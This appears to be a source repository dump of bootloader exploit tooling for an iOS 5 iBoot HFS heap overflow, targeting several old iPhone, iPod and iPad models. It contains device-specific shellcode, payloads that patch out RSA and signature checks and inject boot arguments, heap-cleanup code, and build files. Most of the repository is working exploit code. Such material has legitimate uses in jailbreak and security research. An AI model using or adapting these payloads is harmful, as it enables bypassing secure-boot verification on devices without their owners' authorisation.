├── iPod4,1 └── 8J2 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── prepare_and_jump │ ├── Makefile │ └── prepare_and_jump.S │ ├── Makefile │ └── payload.c ├── iPad1,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── ramdiskH.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── prepare_and_jump.S │ ├── Makefile │ ├── payload_ramdiskH.c │ └── payload.c ├── iPod2,1 └── 8C148 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump │ ├── Makefile │ └── prepare_and_jump.S │ └── payload.c ├── iPhone2,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump.S │ └── payload.c ├── iPhone4,1 └── 9B206 │ ├── ramdiskG.dmg │ ├── netto │ ├── Makefile │ └── nettoyeur.c │ ├── Makefile │ ├── prepare_and_jump.S │ └── payload.c ├── README.md └── make_nettoyeur.c /iPod4,1/8J2/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPod4,1/8J2/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPad1,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/ramdiskH.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPad1,1/9B206/ramdiskH.dmg -------------------------------------------------------------------------------- /iPod2,1/8C148/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPod2,1/8C148/ramdiskG.dmg -------------------------------------------------------------------------------- /iPhone2,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPhone2,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPhone4,1/9B206/ramdiskG.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ralph0045/iBoot-5-Stuff/HEAD/iPhone4,1/9B206/ramdiskG.dmg -------------------------------------------------------------------------------- /iPad1,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPhone2,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin -------------------------------------------------------------------------------- /iPod4,1/8J2/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin 4 | rm nettoyeur.o 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/netto/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc -march=armv6 -c -Os nettoyeur.c 3 | arm-none-eabi-objcopy -O binary nettoyeur.o nettoyeur.bin 4 | rm nettoyeur.o 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Some stuff that can be useful for exploiting the iOS 5 HFS heap buffer overflow iBoot bug 2 | 3 | ## Credits/Thanks 4 | * p0sixninja 5 | * nyan_satan 6 | * JonathanSeals 7 | -------------------------------------------------------------------------------- /iPod4,1/8J2/prepare_and_jump/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | rm prepare_and_jump.o 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv6 -mthumb -o payload.elf 3 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 4 | rm payload.elf 5 | -------------------------------------------------------------------------------- /iPod4,1/8J2/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 3 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 4 | rm payload.elf 5 | -------------------------------------------------------------------------------- /iPod2,1/8C148/prepare_and_jump/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -march=armv6 --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | rm prepare_and_jump.o 5 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin -------------------------------------------------------------------------------- /iPad1,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x16f00 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x307FC 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x5FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x15514 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x2D64C 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x4FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPhone4,1/9B206/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x1C604 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x3CA9C 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x9FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x84000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPod4,1/8J2/prepare_and_jump/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0x173E0 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x37878 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr sp, =0x5FFF8000 17 | bl _cache_stuff 18 | ldr r4, =0x44000000 19 | bx r4 @ reload iBoot 20 | -------------------------------------------------------------------------------- /iPod2,1/8C148/prepare_and_jump/prepare_and_jump.S: -------------------------------------------------------------------------------- 1 | @ shellcode from iloader source, thanks xerub 2 | .text 3 | .syntax unified 4 | 5 | .org 0xF072 6 | .thumb 7 | .thumb_func 8 | _cache_stuff: 9 | bx lr 10 | 11 | .org 0x283D8 12 | .global _prepare_and_jump 13 | .thumb 14 | .thumb_func 15 | _prepare_and_jump: 16 | ldr r0, =0xFFF7800 17 | mov sp, r0 18 | bl _cache_stuff 19 | ldr r0, =0x0B000000 20 | bx r0 @ reload iBoot 21 | -------------------------------------------------------------------------------- /iPad1,1/9B206/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | arm-none-eabi-as -mthumb --fatal-warnings -o prepare_and_jump.o prepare_and_jump.S 3 | arm-none-eabi-objcopy -O binary prepare_and_jump.o prepare_and_jump.bin 4 | arm-none-eabi-gcc payload.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload.elf 5 | arm-none-eabi-objcopy -O binary payload.elf payload.bin 6 | arm-none-eabi-gcc payload_ramdiskH.c -fpie -W -pedantic -Wno-long-long -Os -L. -nostdlib -emain -march=armv7-a -mthumb -o payload_ramdiskH.elf 7 | arm-none-eabi-objcopy -O binary payload_ramdiskH.elf payload_ramdiskH.bin -------------------------------------------------------------------------------- /iPhone4,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x9FF00000 4 | #define TARGET_JUMPADDR 0x84000000 5 | #define PRINTF (0x2ca8c+0x1) 6 | #define BCOPY (0x2cdd4) 7 | #define NETTOYEUR (0x3CACC) 8 | #define PREPARE_AND_JUMP (0x3CA9D) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x9FF00000,(void*)TARGET_JUMPADDR,(size_t)0x3A000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x16254) = 0x60182000; // RSA checks 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x174c4) = 0x4995FAC9; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x31e1c) = 0x762D00; // boot-args="-v" 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x376bc) = 0x80000000; // ticket=loadaddr 34 | 35 | /* ---------------------------------------------------- */ 36 | 37 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 38 | 39 | prepare_and_jump(); 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /iPad1,1/9B206/payload_ramdiskH.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x2342c+0x1) 6 | #define BCOPY (0x23774) 7 | #define NETTOYEUR (0x3086C) 8 | #define PREPARE_AND_JUMP (0x307FD) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2E000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskH */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x012A8) = 0x20009902; // boot-target=0 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x110d4) = 0x60182000; // RSA checks 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x245bc) = 0x66003000; // boot-partition=0 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d004) = 0x5FF01249; // boot-command=upgrade 34 | 35 | /* ---------------------------------------------------- */ 36 | 37 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 38 | 39 | prepare_and_jump(); 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /iPad1,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x2342c+0x1) 6 | #define BCOPY (0x23774) 7 | #define NETTOYEUR (0x3086C) 8 | #define PREPARE_AND_JUMP (0x307FD) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2E000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x00818) = 0x20002100; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x0081c) = 0xf10d2000; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x008e0) = 0x20002000; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x110d4) = 0x60182000; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x12344) = 0x4995fbf7; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x274a0) = 0x00762d00; 36 | 37 | /* ---------------------------------------------------- */ 38 | 39 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 40 | 41 | prepare_and_jump(); 42 | 43 | return 0; 44 | } 45 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x4FF00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x21928+0x1) 6 | #define BCOPY (0x21C70) 7 | #define NETTOYEUR (0x2D67C) 8 | #define PREPARE_AND_JUMP (0x2D64D) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0x4FF00000,(void*)TARGET_JUMPADDR,(size_t)0x2B000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x818) = 0x20002100; // ignore boot-partition 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x81c) = 0xF10D2000; // ignore boot-partition 32 | *(unsigned int *)(TARGET_JUMPADDR + 0xf884) = 0x60182000; // RSA Checks 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x24e14) = 0x6D00762D; // boot-args="-v" 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x28cac) = 0x40000000; // ticket=loadaddress 35 | 36 | /* ---------------------------------------------------- */ 37 | 38 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 39 | 40 | prepare_and_jump(); 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /iPod2,1/8C148/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x0ff00000 4 | #define TARGET_JUMPADDR 0x0B000000 5 | #define PRINTF (0x1CAAC+0x1) 6 | #define BCOPY (0x1cc98) 7 | #define NETTOYEUR (0x28428) 8 | #define PREPARE_AND_JUMP (0x283D9) 9 | 10 | typedef void (*printf_t)(const char *fmt, ...); 11 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 12 | typedef void (*nettoyeur_t)(void); 13 | typedef void (*prepare_and_jump_t)(void); 14 | 15 | int main() { 16 | 17 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 18 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 19 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 20 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 21 | 22 | printf("Hacked\n"); 23 | 24 | bcopy((void*)0xFF00000,(void*)TARGET_JUMPADDR,(size_t)0x27000); 25 | 26 | nettoyeur(); 27 | 28 | /* iBoot Patches - ramdiskG */ 29 | 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x94c4) = 0x47702000; // Signature checks patch 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x12aec) = 0x2000E036; // Signature checks patch 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x12af0) = 0xE0332000; // Signature checks patch 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x1ee68) = 0x6D00762D; // nvram boot-args="-v" 34 | *(unsigned int *)(TARGET_JUMPADDR + 0xa0f0) = 0x2C006813; // Inject boot args 35 | 36 | /* ---------------------------------------------------- */ 37 | 38 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 39 | 40 | prepare_and_jump(); 41 | 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /iPod4,1/8J2/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BASE_ADDR 0x5ff00000 4 | #define TARGET_JUMPADDR 0x44000000 5 | #define PRINTF (0x28B2C+0x1) 6 | #define BCOPY (0x28d4c) 7 | #define CLEAR_INSN_CACHE (0x17090) 8 | #define NETTOYEUR (0x378A8) 9 | #define PREPARE_AND_JUMP (0x37879) 10 | 11 | typedef void (*printf_t)(const char *fmt, ...); 12 | typedef void (*bcopy_t)(const void *src, void *dest, size_t n); 13 | typedef void (*clear_insn_cache_t)(void); 14 | typedef void (*nettoyeur_t)(void); 15 | typedef void (*prepare_and_jump_t)(void); 16 | 17 | int main() { 18 | 19 | printf_t printf = (printf_t)(BASE_ADDR+PRINTF); 20 | bcopy_t bcopy = (bcopy_t)(BASE_ADDR+BCOPY); 21 | clear_insn_cache_t clear_insn_cache = (clear_insn_cache_t)(BASE_ADDR+CLEAR_INSN_CACHE); 22 | nettoyeur_t nettoyeur = (nettoyeur_t)(BASE_ADDR+NETTOYEUR); 23 | prepare_and_jump_t prepare_and_jump = (prepare_and_jump_t)(BASE_ADDR+PREPARE_AND_JUMP); 24 | 25 | clear_insn_cache(); 26 | 27 | printf("Hacked\n"); 28 | 29 | bcopy((void*)0x5FF00000,(void*)TARGET_JUMPADDR,(size_t)0x35000); 30 | 31 | nettoyeur(); 32 | 33 | /* iBoot Patches - ramdiskG */ 34 | 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x120dc) = 0x20002000; // Signature checks 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x1216c) = 0x200049B9; // Signature checks 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x12170) = 0x46042000; // Signature checks 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x121b0) = 0x20002000; // Signature checks 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x121d4) = 0x20002000; // Signature checks 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x1a7e0) = 0x20002000; // Signature checks 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x12d90) = 0x20012020; // debug-enabled 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x12d94) = 0xB1102001; // debug-enabled 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d9c4) = 0x6D00762D; // nvram boot-args="-v" 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x12a3c) = 0x290107A8; // inject boot-args 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x29880) = 0x746F; // ignore boot-partition variable 46 | 47 | /* ---------------------------------------------------- */ 48 | 49 | printf("Jumping into image at %p\n",TARGET_JUMPADDR); 50 | 51 | prepare_and_jump(); 52 | 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /make_nettoyeur.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2020, @Ralph0045 3 | * gcc make_nettoyeur.c -o make_nettoyeur 4 | */ 5 | 6 | #include 7 | #include 8 | 9 | #define TARGET_JUMPADDR 0x44000000 10 | 11 | int main(int argc, char **argv) { 12 | FILE* fp = NULL; 13 | 14 | if(argc < 3){ 15 | printf("Usage: %s \n",argv[0]); 16 | return 0; 17 | } 18 | 19 | void* iboot_orig_buf; 20 | size_t iboot_orig_len; 21 | 22 | // dec iBoot 23 | 24 | fp = fopen(argv[1], "rb"); 25 | if(!fp) { 26 | printf("Error opening %s!\n", argv[1]); 27 | return -1; 28 | } 29 | 30 | fseek(fp, 0, SEEK_END); 31 | iboot_orig_len = ftell(fp); 32 | fseek(fp, 0, SEEK_SET); 33 | 34 | iboot_orig_buf = (void*)malloc(iboot_orig_len); 35 | if(!iboot_orig_buf) { 36 | printf("Out of memory!\n"); 37 | fclose(fp); 38 | return -1; 39 | } 40 | 41 | fread(iboot_orig_buf, 1, iboot_orig_len, fp); 42 | fclose(fp); 43 | 44 | // dumped iBoot 45 | 46 | void* dumped_iboot_buf; 47 | size_t dumped_iboot_len; 48 | 49 | fp = fopen(argv[2], "rb"); 50 | if(!fp) { 51 | printf("Error opening %s!\n", argv[2]); 52 | return -1; 53 | } 54 | 55 | fseek(fp, 0, SEEK_END); 56 | dumped_iboot_len = ftell(fp); 57 | fseek(fp, 0, SEEK_SET); 58 | 59 | dumped_iboot_buf = (void*)malloc(dumped_iboot_len); 60 | if(!dumped_iboot_buf) { 61 | printf("Out of memory!\n"); 62 | fclose(fp); 63 | return -1; 64 | } 65 | 66 | fread(dumped_iboot_buf, 1, dumped_iboot_len, fp); 67 | fclose(fp); 68 | 69 | if(iboot_orig_len!=dumped_iboot_len) { 70 | printf("Error: size doesn't match!\n"); 71 | return -1; 72 | } 73 | 74 | FILE *fo; 75 | fo = fopen("nettoyeur.c", "w"); 76 | 77 | fprintf(fo, "#include \n\n"); 78 | fprintf(fo, "#define TARGET_JUMPADDR %p\n\n",(void*)TARGET_JUMPADDR); 79 | fprintf(fo, "int\nmain (void)\n{\n\n"); 80 | 81 | for (unsigned i=0;i!=iboot_orig_len;i+=0x4) { 82 | if(*(uint32_t*)iboot_orig_buf!=*(uint32_t*)dumped_iboot_buf) { 83 | fprintf(fo, "\t*(unsigned int *)(TARGET_JUMPADDR + 0x%x) = 0x%02X;",i,*(uint32_t*)iboot_orig_buf); 84 | fprintf(fo, "\n"); 85 | } 86 | iboot_orig_buf += 0x4; 87 | dumped_iboot_buf += 0x4; 88 | } 89 | 90 | fprintf(fo, "\n\treturn 0;\n"); 91 | fprintf(fo, "}\n"); 92 | 93 | printf("Wrote nettoyeur\n"); 94 | } 95 | -------------------------------------------------------------------------------- /iPad1,1/9B206/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x44000000 4 | 5 | int 6 | main(void) 7 | { 8 | 9 | unsigned i; 10 | 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d118) = 0x00000000; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d11c) = 0x00000000; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d12c) = 0x00000000; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d128) = 0x00000000; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d130) = 0x00000000; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1b8) = 0x00000000; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1bc) = 0x00000000; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1cc) = 0x00000000; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d1d0) = 0x00000000; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d280) = 0xFFFFFFFF; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d28c) = 0x00000011; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d290) = 0x5FF2D290; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d294) = 0x5FF2D290; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d0) = 0x5FF2D2D0; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d4) = 0x5FF2D2D0; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2d8) = 0x5FF2D2D8; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2dc) = 0x5FF2D2D8; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2e4) = 0xFFFFFFFF; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2e8) = 0xFFFFFFFF; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d2ec) = 0x00000000; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d300) = 0x5FF2D320; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d310) = 0x5FF2D310; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d314) = 0x5FF2D310; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d318) = 0x5FF2D318; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d31c) = 0x5FF2D318; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d334) = 0x00000002; 37 | for (i = 0; i <= 0x2d388 - 0x2d33c; i += 4) { 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d33c + i) = 0x00000000; 39 | } 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d3b8) = 0xFFFFFFFF; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d370) = 0x00004000; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d374) = 0x00000000; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d378) = 0x01000000; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d900) = 0x00000000; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d920) = 0x00000000; 46 | for (i = 0; i <= 0x2dbd0 - 0x2da80; i += 4) { 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x2da80 + i) = 0x00000000; 48 | } 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d370) = 0x00000000; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x2d378) = 0x00000000; 51 | 52 | return 0; 53 | } 54 | -------------------------------------------------------------------------------- /iPhone2,1/9B206/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x44000000 4 | 5 | int 6 | main(void) 7 | { 8 | 9 | unsigned i; 10 | 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0cc) = 0x00; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0d8) = 0x00; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0dc) = 0x00; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a0e0) = 0x00; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a1d0) = 0xFFFFFFFF; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a1dc) = 0x11; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a2bc) = 0x4FF2A2BC; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a2c0) = 0x4FF2A2BC; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a300) = 0x4FF2A300; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a304) = 0x4FF2A300; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a308) = 0x4FF2A308; 22 | 